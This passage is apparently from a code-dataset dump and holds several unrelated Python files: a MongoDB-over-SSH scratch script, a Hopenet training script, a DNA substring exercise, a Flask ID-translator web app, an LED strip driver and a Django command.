sys.exit()\n\n if not perf_temp.empty:\n def to_dict(x):\n if isinstance(x, str):\n return json.loads(x)\n return x\n perf_temp['miss_lst'] = perf_temp['miss_lst'].apply(to_dict)\n\n # numb_temp = pd.DataFrame(list(db_number[book].find()))\n numb_temp = pi_data_fetch('math_book_info', book, None)\n\n # orig_temp = pd.DataFrame(list(db_origin[book].find()))\n orig_temp = pi_data_fetch('math_exercise_origins', book, None)\n\n if perf_temp.shape[0] > 0:\n df_grande_ass, df_grande_test = the_big_one(\n book,\n numb_temp,\n orig_temp,\n perf_temp\n )\n df_assignment = df_assignment.append(df_grande_ass)\n df_test = df_test.append(df_grande_test)\n return df_assignment.append(df_test)\n\n\ndef pi_data_fetch(dbs, collection):\n ssh_host = os.getenv('raspberry_pi_ip')\n ssh_user = os.getenv('raspberry_pi_username')\n ssh_password = os.getenv('raspberry_pi_password')\n\n with SSHTunnelForwarder(\n ssh_host,\n ssh_username=ssh_user,\n ssh_password=ssh_password,\n remote_bind_address=('127.0.0.1', 27017)\n ) as server:\n with MongoClient(\n host='127.0.0.1',\n port=server.local_bind_port\n ) as client:\n db = pd.DataFrame(list(client[dbs][collection].find()))\n\n\n # for ind, row in enumerate(list(client[dbs][collection].find())):\n # try:\n # row['chapter']\n # except:\n # print({'_id': row['_id']})\n # client[dbs][collection].update({'_id': row['_id']}, {'book': collection, 'origin_list': row['origin_list'], 'chapter': ind + 1, })\n # print('\\n')\n\n\n # import ast\n # for row in list(client[dbs][collection].find()):\n # if type(row['origin_list']) == str:\n # print({'_id': row['_id']})\n # print({'origin_list': ast.literal_eval(row['origin_list'])})\n # client[dbs][collection].update({'_id': row['_id']}, {'book': collection, 'origin_list': ast.literal_eval(row['origin_list']), 'chapter': row['chapter']})\n # print('\\n')\n\n\n # sys.exit()\n return db\n\ndef p_main():\n db = pi_data_fetch('math_exercise_origins', 'Math_5_4')\n # db = pi_data_fetch('math_exercise_origins', 
'Algebra_1_2')\n # db = pi_data_fetch('math_exercise_origins', 'Math_7_6')\n # db = pi_data_fetch('math_exercise_origins', 'Algebra_1')\n # db = pi_data_fetch('math_exercise_origins', 'Math_8_7')\n print(db)\n\ndef main():\n for user in ['Calvin', 'Samuel']:\n qp = query_performance(user).reset_index(drop=True)\n qp['chapter'] = qp['chapter'].astype(str)\n # print(qp.info())\n # sys.exit()\n\n qp['name'] = user\n qp['date'] = qp['date'].dt.date.astype(str)\n qp['meta__insert_time'] = str(datetime.datetime.today().strftime('%Y-%m-%d %H:%M'))\n # print(qp.head(100))\n\nif __name__ == '__main__':\n main()\n # p_main()\n# todo: this is cool, but need to fetch the data and use it to figure out what is wrong with aggregator_math_performance.py\n","sub_path":"scratch/ssh_scratch.py","file_name":"ssh_scratch.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107137425","text":"import sys\nimport os\nimport argparse\nimport time\nimport pickle as pkl\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torch.utils.model_zoo as model_zoo\n\nimport datasets\nimport hopenet\nimport utils\n\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=\"Head pose estimation using the Hopenet network.\"\n )\n parser.add_argument(\n \"--num_epochs\",\n dest=\"num_epochs\",\n help=\"Maximum number of training epochs.\",\n default=5,\n type=int,\n )\n parser.add_argument(\n \"--batch_size\", dest=\"batch_size\", help=\"Batch size.\", default=16, type=int\n )\n parser.add_argument(\n \"--lr\", dest=\"lr\", help=\"Base learning rate.\", default=0.001, type=float\n )\n parser.add_argument(\n \"--dataset\",\n dest=\"dataset\",\n help=\"Dataset type.\",\n default=\"Pose_300W_LP\",\n type=str,\n )\n parser.add_argument(\n 
\"--val_dataset\",\n dest=\"val_dataset\",\n help=\"Dataset type.\",\n default=\"AFLW2000\",\n type=str,\n )\n parser.add_argument(\n \"--data_dir\",\n dest=\"data_dir\",\n help=\"Directory path for data.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--out_dir\",\n dest=\"out_dir\",\n help=\"Directory path for snapshots and loss stats.\",\n default=\"output/snapshots/\",\n type=str,\n )\n parser.add_argument(\n \"--filename_list\",\n dest=\"filename_list\",\n help=\"Path to text file containing relative paths for every example.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--val_filename_list\",\n dest=\"val_filename_list\",\n help=\"Path to text file containing relative paths for every example.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--output_string\",\n dest=\"output_string\",\n help=\"String appended to output snapshots.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--alpha\",\n dest=\"alpha\",\n help=\"Regression loss coefficient.\",\n default=0.001,\n type=float,\n )\n parser.add_argument(\n \"--snapshot\",\n dest=\"snapshot\",\n help=\"Path of model snapshot.\",\n default=\"\",\n type=str,\n )\n parser.add_argument(\n \"--mobilenet_width\",\n dest=\"mobilenet_width\",\n help=\"Width coef of the MobileNet.\",\n default=1.0,\n type=float,\n )\n\n args = parser.parse_args()\n return args\n\n\n# FIXME use these functions for freezing layers\ndef get_ignored_params(model):\n # Generator function that yields ignored params.\n b = [model.conv1, model.bn1, model.fc_finetune]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n if \"bn\" in module_name:\n module.eval()\n for name, param in module.named_parameters():\n yield param\n\n\ndef get_non_ignored_params(model):\n # Generator function that yields params that will be optimized.\n b = [model.layer1, model.layer2, model.layer3, model.layer4]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n 
if \"bn\" in module_name:\n module.eval()\n for name, param in module.named_parameters():\n yield param\n\n\ndef get_fc_params(model):\n # Generator function that yields fc layer params.\n b = [model.fc_yaw, model.fc_pitch, model.fc_roll]\n for i in range(len(b)):\n for module_name, module in b[i].named_modules():\n for name, param in module.named_parameters():\n yield param\n\n\ndef load_filtered_state_dict(model, snapshot):\n # By user apaszke from discuss.pytorch.org\n model_dict = model.state_dict()\n snapshot = {k: v for k, v in snapshot.items() if k in model_dict}\n model_dict.update(snapshot)\n model.load_state_dict(model_dict)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n num_epochs = args.num_epochs\n batch_size = args.batch_size\n\n if not os.path.exists(\"output/snapshots\"):\n os.makedirs(\"output/snapshots\")\n\n # MObilenet backbone\n model = hopenet.Hopenet_mobilenet(\n num_bins=66, width_mult=args.mobilenet_width, pretrained=False\n )\n\n if not args.snapshot == \"\":\n print(\"Loading weights from \", args.snapshot)\n saved_state_dict = torch.load(args.snapshot)\n model.load_state_dict(saved_state_dict)\n\n print(\"Loading data.\")\n\n transformations = transforms.Compose(\n [\n transforms.Resize(240),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n\n val_transformations = transforms.Compose(\n [\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]\n )\n\n if args.dataset == \"Pose_300W_LP\":\n pose_dataset = datasets.Pose_300W_LP(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"Pose_300W_LP_random_ds\":\n pose_dataset = datasets.Pose_300W_LP_random_ds(\n args.data_dir, args.filename_list, transformations\n )\n elif 
args.dataset == \"Synhead\":\n pose_dataset = datasets.Synhead(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"AFLW2000\":\n pose_dataset = datasets.AFLW2000(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"BIWI\":\n pose_dataset = datasets.BIWI(args.data_dir, args.filename_list, transformations)\n elif args.dataset == \"AFLW\":\n pose_dataset = datasets.AFLW(args.data_dir, args.filename_list, transformations)\n elif args.dataset == \"AFLW_aug\":\n pose_dataset = datasets.AFLW_aug(\n args.data_dir, args.filename_list, transformations\n )\n elif args.dataset == \"AFW\":\n pose_dataset = datasets.AFW(args.data_dir, args.filename_list, transformations)\n else:\n print(\"Error: not a valid dataset name\")\n sys.exit()\n\n train_loader = torch.utils.data.DataLoader(\n dataset=pose_dataset, batch_size=batch_size, shuffle=True, num_workers=2\n )\n\n # FIXME\n assert args.val_dataset == \"AFLW2000\"\n val_dataset = datasets.AFLW2000(\n args.data_dir, args.val_filename_list, val_transformations\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset=val_dataset, batch_size=batch_size // 2, shuffle=False, num_workers=2\n )\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n reg_criterion = nn.MSELoss().to(device)\n # Regression loss coefficient\n alpha = args.alpha\n\n softmax = nn.Softmax(dim=1).to(device)\n idx_tensor = [idx for idx in range(66)]\n # idx_tensor = Variable(torch.FloatTensor(idx_tensor))\n idx_tensor = torch.FloatTensor(idx_tensor).to(device)\n\n if args.mobilenet_width != 1.0:\n # training from scratch, so use equal lr for all params\n optimizer = torch.optim.Adam(\n [\n # {\"params\": get_ignored_params(model), \"lr\": 0},\n {\"params\": model.backbone.parameters(), \"lr\": args.lr * 5},\n {\"params\": get_fc_params(model), \"lr\": args.lr * 5},\n ],\n lr=args.lr,\n )\n else:\n optimizer = torch.optim.Adam(\n [\n # {\"params\": get_ignored_params(model), 
\"lr\": 0},\n {\"params\": model.backbone.parameters(), \"lr\": args.lr},\n {\"params\": get_fc_params(model), \"lr\": args.lr * 5},\n ],\n lr=args.lr,\n )\n\n print(\"Ready to train network.\")\n training_stats = {\n \"loss_yaw\": [],\n \"loss_pitch\": [],\n \"loss_roll\": [],\n \"val_yaw_error\": [],\n \"val_pitch_error\": [],\n \"val_roll_error\": [],\n }\n for epoch in range(num_epochs):\n start = time.time()\n for i, (images, labels, cont_labels, name) in enumerate(train_loader):\n images = images.to(device)\n\n # Binned labels\n label_yaw = labels[:, 0].to(device)\n label_pitch = labels[:, 1].to(device)\n label_roll = labels[:, 2].to(device)\n\n # Continuous labels\n label_yaw_cont = cont_labels[:, 0].to(device)\n label_pitch_cont = cont_labels[:, 1].to(device)\n label_roll_cont = cont_labels[:, 2].to(device)\n\n # Forward pass\n yaw, pitch, roll = model(images)\n\n # Cross entropy loss\n loss_yaw = criterion(yaw, label_yaw)\n loss_pitch = criterion(pitch, label_pitch)\n loss_roll = criterion(roll, label_roll)\n\n # MSE loss\n yaw_predicted = softmax(yaw)\n pitch_predicted = softmax(pitch)\n roll_predicted = softmax(roll)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1) * 3 - 99\n pitch_predicted = torch.sum(pitch_predicted * idx_tensor, 1) * 3 - 99\n roll_predicted = torch.sum(roll_predicted * idx_tensor, 1) * 3 - 99\n\n loss_reg_yaw = reg_criterion(yaw_predicted, label_yaw_cont)\n loss_reg_pitch = reg_criterion(pitch_predicted, label_pitch_cont)\n loss_reg_roll = reg_criterion(roll_predicted, label_roll_cont)\n\n # Total loss\n loss_yaw += alpha * loss_reg_yaw\n loss_pitch += alpha * loss_reg_pitch\n loss_roll += alpha * loss_reg_roll\n\n training_stats[\"loss_yaw\"].append(loss_yaw)\n training_stats[\"loss_pitch\"].append(loss_pitch)\n training_stats[\"loss_roll\"].append(loss_roll)\n\n loss_seq = [loss_yaw, loss_pitch, loss_roll]\n grad_seq = [torch.ones(1).to(device) for _ in range(len(loss_seq))]\n optimizer.zero_grad()\n 
torch.autograd.backward(loss_seq, grad_seq)\n optimizer.step()\n\n if (i + 1) % 100 == 0:\n print(\n \"Epoch [{}/{}], Iter [{}/{}] Losses: Yaw {:.4f}, Pitch {:.4f}, Roll {:.4f}\".format(\n epoch + 1,\n num_epochs,\n i + 1,\n len(pose_dataset) // batch_size,\n loss_yaw.item(),\n loss_pitch.item(),\n loss_roll.item(),\n )\n )\n\n elapsed_time = time.time() - start\n\n # Save models at numbered epochs.\n if epoch % 1 == 0 and epoch < num_epochs:\n print(\n \"Epoch completed in {:.1f} seconds. Taking snapshot...\".format(\n elapsed_time\n )\n )\n torch.save(\n model.state_dict(),\n os.path.join(\n args.out_dir,\n args.output_string + \"_epoch_\" + str(epoch + 1) + \".pkl\",\n ),\n )\n\n # VALIDATE on \"AFLW2000\"\n model.eval()\n total = 0\n\n idx_tensor = [idx for idx in range(66)]\n idx_tensor = torch.FloatTensor(idx_tensor).to(device)\n\n yaw_error = 0.0\n pitch_error = 0.0\n roll_error = 0.0\n\n for i, (images, labels, cont_labels, name) in enumerate(val_loader):\n images = images.to(device)\n total += cont_labels.size(0)\n\n label_yaw = cont_labels[:, 0].float()\n label_pitch = cont_labels[:, 1].float()\n label_roll = cont_labels[:, 2].float()\n\n yaw, pitch, roll = model(images)\n\n # Binned predictions\n _, yaw_bpred = torch.max(yaw.data, 1)\n _, pitch_bpred = torch.max(pitch.data, 1)\n _, roll_bpred = torch.max(roll.data, 1)\n\n # Continuous predictions\n yaw_predicted = utils.softmax_temperature(yaw.data, 1)\n pitch_predicted = utils.softmax_temperature(pitch.data, 1)\n roll_predicted = utils.softmax_temperature(roll.data, 1)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1).cpu() * 3 - 99\n pitch_predicted = (\n torch.sum(pitch_predicted * idx_tensor, 1).cpu() * 3 - 99\n )\n roll_predicted = (\n torch.sum(roll_predicted * idx_tensor, 1).cpu() * 3 - 99\n )\n\n # Mean absolute error\n yaw_error += torch.sum(torch.abs(yaw_predicted - label_yaw))\n pitch_error += torch.sum(torch.abs(pitch_predicted - label_pitch))\n roll_error += 
torch.sum(torch.abs(roll_predicted - label_roll))\n\n yaw_error = yaw_error / total\n pitch_error = pitch_error / total\n roll_error = roll_error / total\n training_stats[\"val_yaw_error\"].append(yaw_error)\n training_stats[\"val_pitch_error\"].append(pitch_error)\n training_stats[\"val_roll_error\"].append(roll_error)\n print(\n \"Validation error in degrees of the model on the \"\n + str(total)\n + \" test images. Yaw: %.4f, Pitch: %.4f, Roll: %.4f\"\n % (yaw_error, pitch_error, roll_error)\n )\n model.train() # back to training mode\n\n with open(\n os.path.join(args.out_dir, \"losses\" + args.output_string + \".pkl\"), \"wb\"\n ) as handle:\n pkl.dump(training_stats, handle)\n","sub_path":"code/train_hopenet_mobilenet.py","file_name":"train_hopenet_mobilenet.py","file_ext":"py","file_size_in_byte":13970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415517432","text":"#!/usr/bin/env python\n\n\"\"\" Assignment 2, Exercise 2, INF1340, Fall, 2015. 
DNA Sequencing\n\nThis module converts performs substring matching for DNA sequencing\n\n\"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n__copyright__ = \"2015 Susan Sim\"\n__license__ = \"MIT License\"\n\n\ndef find(input_string, substring, start, end):\n\n \"\"\"\n :param: string, substring, start integer, end integer\n :return: start index of string as integer\n :raises: -1\n \"\"\"\n while start < end:\n if input_string[start:start + len(substring)] == substring:\n return start\n else:\n start += 1\n return -1\n\n\ndef multi_find(input_string, substring, start, end):\n\n \"\"\"\n :param: string, substring, start integer, end integer\n :return: variable result\n :raises: -1\n \"\"\"\n result = \"\"\n\n while start < end:\n if input_string[start:start + len(substring)] == substring:\n result = result + str(start) + \",\"\n start += 1\n else:\n start += 1\n\n result = result[0:len(result) - 1]\n return -1\n","sub_path":"exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322255518","text":"\"\"\"\nMethods to handle incoming requests - GSC version, uses gsc_handler\n\n\"\"\"\n\nimport json\nimport sys\nfrom flask import current_app, Blueprint, redirect, request, \\\n url_for, render_template, Response, jsonify\n\nfrom flask_login import login_user, login_required\nfrom flask_bootstrap import __version__ as FLASK_BOOTSTRAP_VERSION\nfrom flask_nav.elements import Navbar, View, Subgroup, Link, Text\nfrom keycloak import exceptions\nfrom pymongo.errors import ConnectionFailure, ServerSelectionTimeoutError, InvalidName\n\nfrom id_translator.api.nav import nav, Alert\nfrom id_translator.api.logging import apilog\nfrom id_translator.forms.forms import AdminLoginForm, AdminToolsForm, \\\n HomeForm, TranslateForm, EditorForm, UploadForm\nfrom id_translator.auth.id_user import User\nfrom id_translator.api.tables import 
EditTable, Item\n\n\noperations = Blueprint('operations', 'operations', url_prefix='/')\n\nAPP = current_app\n\nnav.register_element('frontend_top', Navbar(\n View('ID Translator', '.get_home'),\n Subgroup(\n 'Docs',\n Link('CanDIG', 'https://candig.bcgsc.ca/'),\n ),\n Text('Using Flask-Bootstrap {}'.format(FLASK_BOOTSTRAP_VERSION)),\n Alert(alerts=\"alerts\", ids=\"nav-alert\"),\n ))\n\n\n\n@apilog\n@operations.route('/', methods=['GET', 'POST'])\n@operations.route('/home', methods=['GET', 'POST'])\ndef get_home():\n \"\"\"\n Landing Page\n\n \"\"\"\n form = HomeForm()\n\n if form.validate_on_submit():\n if form.translate.data:\n return redirect(url_for('operations.translate'))\n if form.admin.data:\n return redirect(url_for('operations.admin_login'))\n return render_template('b_home.html', form=form)\n\n\n@apilog\n@operations.route('/admin_login', methods=['GET', 'POST'])\ndef admin_login():\n \"\"\"\n Login Page to access Editor and Upload tools\n \"\"\"\n form = AdminLoginForm()\n\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n if form.validate_on_submit():\n try:\n token = APP.config[\"KeycloakHandler\"].conn.token(form.username.data, form.password.data)\n except exceptions.KeycloakAuthenticationError:\n print(\"Invalid login\")\n return render_template('b_login.html', form=form)\n else:\n user_info = APP.config[\"KeycloakHandler\"].conn.userinfo(token['access_token'])\n user = User(form.username.data)\n if \"id_edit\" in user_info[\"Access_Permissions\"]:\n login_user(user)\n return redirect(url_for('operations.admin_tools'))\n\n return render_template('b_login.html', form=form)\n\n\n@apilog\n@operations.route('/admin_tools', methods=['GET', 'POST'])\n@login_required\ndef admin_tools():\n \"\"\"\n Navigation page to access Editor and Upload tools\n \"\"\"\n form = AdminToolsForm()\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n if form.edit.data:\n return redirect(url_for('operations.editor'))\n if 
form.upload.data:\n return redirect(url_for('operations.upload'))\n return render_template('b_admin_tools.html', form=form)\n\n\n@apilog\n@operations.route('/editor', methods=['GET', 'POST'])\n@login_required\ndef editor():\n \"\"\"\n In browser GUI manipulator for Mongo records. Most buttons rely heavily\n on ../static/js/editor.js functions and supporting _helper functions\n defined below.\n\n Produces an editable table of a record searched up using the primary key\n defined in the configuration file. This table uses the X-editable library\n to allow each cell to be edited.\n\n Changes to the table are tracked as a copy of the record stored within the\n MongoHandler class until submission.\n\n \"\"\"\n eform = EditorForm()\n uform = UploadForm()\n pkey = APP.config['project']['PRIMARY_KEY']\n\n table = None\n #APP.config[\"MongoHandler\"].clear_local_temp_records()\n\n if eform.back.data:\n return redirect(url_for('operations.admin_tools'))\n if eform.editor_query.data and eform.validate_on_submit():\n record = APP.config[\"MongoHandler\"].get_record(eform.editor_query.data)\n if record:\n APP.config[\"MongoHandler\"].set_editing_record(record)\n APP.config[\"MongoHandler\"].set_delete_record()\n items = [Item(k, v) for k, v in record.items()]\n table = EditTable(items, table_id=\"Editor\")\n else:\n return Response(\"{} is not a primary key of this collection\".\n format(eform.editor_query.data),\n mimetype=\"text/html\",\n status=404)\n\n return render_template('b_editor.html',\n eform=eform,\n uform=uform,\n table=table,\n pkey=pkey)\n\n\n@apilog\n@operations.route('/keycheck', methods=['GET', 'POST'])\ndef key_check():\n \"\"\"\n Route accessed via AJAX calls to determine whether a\n search term is a valid primary key. 
Used by editor.js\n\n \"\"\"\n search_id = request.form['search']\n\n if APP.config[\"MongoHandler\"].get_record(search_id):\n return Response(status=200)\n\n return Response(status=404)\n\n\n@apilog\n@operations.route('/editor_helper', methods=['GET', 'POST'])\ndef editor_helper():\n \"\"\"\n Helper function to allow proper editing and addition of new\n key-pairs/rows to the db document/table. When a new row is\n created, the value is only able to be added once the key has\n been assigned a value. This logic is handled in the editor.js\n and this function expects that input flow.\n\n New rows have incremented DOM ids following a '++Project_X, ++ID_X'\n scheme, where X is the nth newest row, tracked by editor.js\n\n \"\"\"\n if APP.config[\"MongoHandler\"].check_editing_record():\n record = APP.config[\"MongoHandler\"].get_editing_record()\n form_dict = request.form\n edited = form_dict['value'].strip()\n edited = edited.replace(\" \", \"_\")\n new_record = form_dict['name'].split(\"_\")[0]\n\n if new_record == \"++Project\":\n \"\"\"\n A new entry needs to be added into the existing record. Use the sibling to grab\n the corresponding value\n \"\"\"\n record[edited] = form_dict['sibling']\n\n elif new_record == \"++ID\":\n \"\"\"\n A new ID has been added. 
The javascript on the Editor page prevents this from being\n editable until the Project field has been filled out, so the only possibility is that\n a keypair using the new Project (sibling) is in the record.\n \"\"\"\n try:\n record[form_dict['sibling']] = edited\n except KeyError:\n \"\"\"\n This really should not happen.\n \"\"\"\n raise KeyError\n else:\n try:\n value = record[form_dict['name']]\n \"\"\"\n If the code reaches this point it means that the value being edited is the\n project name, not ID, so the previous record needs to be deleted and remade.\n \"\"\"\n record.pop(form_dict['name'])\n record[edited] = value\n except KeyError:\n \"\"\"\n If a KeyError happens at this point, it means the value of a key,value pair in the\n mongo record has been edited, so use the sibling to access the pair and update it.\n \"\"\"\n try:\n val = record[form_dict['sibling']]\n record[form_dict['sibling']] = edited\n\n except KeyError:\n \"\"\"\n This second KeyError shouldn't ever trigger unless something is going \n really wrong with the backend records.\n \"\"\"\n APP.logger.warn(KeyError)\n raise KeyError\n\n APP.config[\"MongoHandler\"].set_editing_record(record)\n return Response(edited, status=200)\n return Response(status=400)\n\n\n@apilog\n@operations.route('/editor_upload', methods=['GET', 'POST'])\ndef editor_upload():\n \"\"\"\n Any changes made to a table in the Editor page will only be applied\n to the actual MongoDB record once this function is called via AJAX.\n\n This function is tied to the 'Upload Changes' button in the page.\n \"\"\"\n if APP.config[\"MongoHandler\"].check_editing_record():\n primary = request.form[APP.config[\"project\"][\"PRIMARY_KEY\"]]\n APP.config[\"MongoHandler\"].set_record(primary)\n return Response(status=200)\n\n return Response(status=404)\n\n@apilog\n@operations.route('/editor_delete', methods=['GET', 'POST'])\ndef editor_delete():\n \"\"\"\n Any deletions made to the table are tracked by a dictionary in the 
MongoHandler.\n These deletions will be applied once the editor_upload() function is called.\n \"\"\"\n form_dict = request.form\n try:\n APP.config[\"MongoHandler\"].add_to_delete(form_dict['project'], form_dict['id'])\n\n except KeyError:\n return Response(\"Invalid delete keys\", status=404)\n\n return Response(\"Project: {} with ID: {} queued for deletion!\".\n format(form_dict['project'], form_dict['id']), status=200)\n\n\n@apilog\n@operations.route('/translate', methods=['GET', 'POST'])\ndef translate():\n \"\"\"\n Route to display browser page for Translate. Buttons and form depend\n on ../static/js/translate.js.\n\n Any ID specified within 'IDS_TO_RETURN' are valid search IDs\n \"\"\"\n form = TranslateForm()\n ids = APP.config['project']['IDS_TO_RETURN']\n translated = None\n\n if form.back.data:\n return redirect(url_for('operations.get_home'))\n\n if form.validate_on_submit():\n translated = APP.config[\"MongoHandler\"].translate(form.query.data)\n\n return render_template('b_translate.html', form=form, ids=ids, translated=translated)\n\n\n@operations.route('/translate/<_id>', methods=['GET'])\ndef api_translate(_id):\n \"\"\"\n API endpoint of Translate function. 
Returns all translatable\n IDs of id_\n\n :param _id: string\n :return:\n \"\"\"\n\n translated = APP.config[\"MongoHandler\"].translate(_id)\n if translated:\n return jsonify(translated)\n\n return Response(\"ID not associated with any projects\", mimetype=\"text/html\", status=404)\n\n\n@operations.route('/translate_helper', methods=['GET', 'POST'])\ndef translate_helper():\n \"\"\"\n Helper function to be called via AJAX tied to 'Translate' button on page.\n Returns a table of the translated values rather than just the JSON output\n\n \"\"\"\n\n term = request.form['query']\n\n translated = APP.config[\"MongoHandler\"].translate(term)\n\n if translated:\n table = APP.config[\"MongoHandler\"].make_translated_table(translated)\n\n if table:\n return Response(str(table.__html__()), status=200)\n\n return Response(\"{} is not a valid search key.\".format(term), status=404)\n\n\n@apilog\n@operations.route('/upload', methods=['GET', 'POST'])\n@login_required\ndef upload():\n \"\"\"\n Route to upload page. Buttons and form utilize ../static/js/uploader_gsc.js\n to perform their roles, notably the 'Missed Records' button is an AJAX\n call to get_missed_table() below\n\n \"\"\"\n form = UploadForm()\n whole_form = request.form\n\n table = None\n\n if form.back.data:\n return redirect(url_for('operations.admin_tools'))\n\n \"\"\"\n Normally the upload_confirm button is a boolean field but\n for this page, the uploader_gsc.js is replacing the boolean \n with the name of the file selected. 
However, as far as the\n python code cares, it's still a boolean so accessing the data\n from the .data field doesn't work.\n \"\"\"\n if form.upload_confirm.data:\n\n try:\n filename = whole_form['upload_confirm']\n file_path = '{}/data/{}'.format(sys.path[0], filename)\n APP.config[\"MongoHandler\"].update_temp_collection(file_path)\n missed, new = APP.config[\"MongoHandler\"].update_main_collection()\n\n if missed:\n missed_msg = \"{} records were unable to be uploaded due to missing \"\\\n \"{} links. Contact BioApps for details. Missed records \"\\\n \"are viewable below.\".format(missed, APP.config['project']['PRIMARY_KEY'])\n\n updated_msg = \"{} records were added to or updated in the database.\".format(new)\n\n payload = json.dumps({\"missed\": missed_msg, \"updated\": updated_msg})\n\n return Response(response=payload, status=206, mimetype='application/json')\n return Response(status=200)\n\n except ConnectionFailure:\n return Response(\"Cannot Establish Connection to Database\", status=500)\n except FileNotFoundError:\n return Response(\"File Not Found\", status=404)\n\n return render_template('/b_upload_gsc.html', form=form, table=table)\n\n\n@operations.route('/get_missed_table')\ndef get_missed_table():\n \"\"\"\n Accessed via AJAX to display any missed entries not linked via\n a BioApps file\n\n \"\"\"\n table = APP.config[\"MongoHandler\"].get_missed_table()\n\n return Response(str(table.__html__()), status=200)\n\n@apilog\n@operations.route('/get_uploads')\ndef get_uploads():\n \"\"\"\n Route called via AJAX to populate the dropdown menu in\n the Upload page\n \"\"\"\n\n files = APP.config[\"MongoHandler\"].get_upload_files()\n return jsonify(files)\n\n\n@operations.route('/get_panel_info')\ndef get_panel_info():\n \"\"\"\n Route called via AJAX to get data to populate the info\n panel next to the jumbotron in Translate, Editor and Upload\n \"\"\"\n main_db = APP.config[\"MongoHandler\"].get_main_db_count()\n primary = 
APP.config[\"project\"][\"PRIMARY_KEY\"]\n projects = APP.config[\"project\"][\"IDS_TO_RETURN\"]\n\n return jsonify({\n \"Searchable Records\": main_db,\n \"Editor Search Key\": primary,\n \"Valid Translation IDs\": projects\n })\n\n\n@operations.route('/autocomplete_translate', methods=['GET'])\ndef autocomplete_translate():\n \"\"\"\n Called by jQueryUI autocomplete widget in ../static/js/translate.js\n to assist in searching up valid terms for translation\n \"\"\"\n\n terms = APP.config[\"MongoHandler\"].get_partial_record(\n request.args['term'], all_fields=True)\n\n return jsonify(matched=terms)\n\n\n@operations.route('/autocomplete_editor', methods=['GET'])\ndef autocomplete_editor():\n \"\"\"\n Called by jQueryUI autocomplete widget in ../static/js/editor.js\n to assist in searching up valid primary keys\n \"\"\"\n terms = APP.config[\"MongoHandler\"].get_partial_record(\n request.args['term'], all_fields=False)\n\n return jsonify(matched=terms)\n\n\n@operations.app_errorhandler(ServerSelectionTimeoutError)\n@operations.app_errorhandler(InvalidName)\ndef handle_error(error):\n message = [str(x) for x in error.args]\n status_code = 500\n success = False\n response = {\n 'success': success,\n 'error': {\n 'type': error.__class__.__name__,\n 'message': message\n }\n }\n\n return jsonify(response), status_code\n","sub_path":"id_translator/blueprints/operations_gsc.py","file_name":"operations_gsc.py","file_ext":"py","file_size_in_byte":15136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224695325","text":"import RPi.GPIO as GPIO, time\n\nclass LedDriver:\n\t\n\tdef Color(self, r, g, b):\n\t\treturn ((r & 0xFF) << 16) | ((g & 0xFF) << 8) | (b & 0xFF)\n\t\n\tdef writeStrip(self, pixels):\n\t\tspidev = file(\"/dev/spidev0.0\", \"w\")\n\t\tfor i in range(len(pixels)):\n\t\t\tspidev.write(chr((pixels[i]>>16) & 0xFF))\n\t\t\tspidev.write(chr((pixels[i]>>8) & 0xFF))\n\t\t\tspidev.write(chr(pixels[i] & 
0xFF))\n\t\tspidev.close()\n\t\ttime.sleep(0.002)\t\n\t\n\tdef setPixelColor(self, pixels, n, r, g, b):\n\t\tif (n >= len(pixels)):\n\t\t\treturn\n\t\tpixels[n] = self.Color(r,g,b)\n\t\n\tdef clearStrip(self, pixels):\n\t\tfor i in range(len(pixels)):\n\t\t\tself.setPixelColor(pixels, i, 0,0,0)\n\t\tself.writeStrip(pixels)","sub_path":"LedDriver.py","file_name":"LedDriver.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175552817","text":"from django.core.management.base import BaseCommand, CommandError\nfrom helloworld.models import Entity\n\nclass Command(BaseCommand):\n help = 'Shows the Hello message for a given entity_id'\n\n def add_arguments(self, parser):\n parser.add_argument('entity_id', type=int)\n\n def handle(self, *args, **options):\n entity_id = options['entity_id']\n try:\n entity = Entity.objects.get(pk=entity_id)\n except Entity.DoesNotExist:\n raise CommandError('Entity with id {} does not exist'.format(entity_id))\n\n self.stdout.write(self.style.SUCCESS('Hello {}'.format(entity.name)))\n","sub_path":"interview/helloworld/management/commands/hello_entity.py","file_name":"hello_entity.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"520128541","text":"# coding:utf-8\nimport 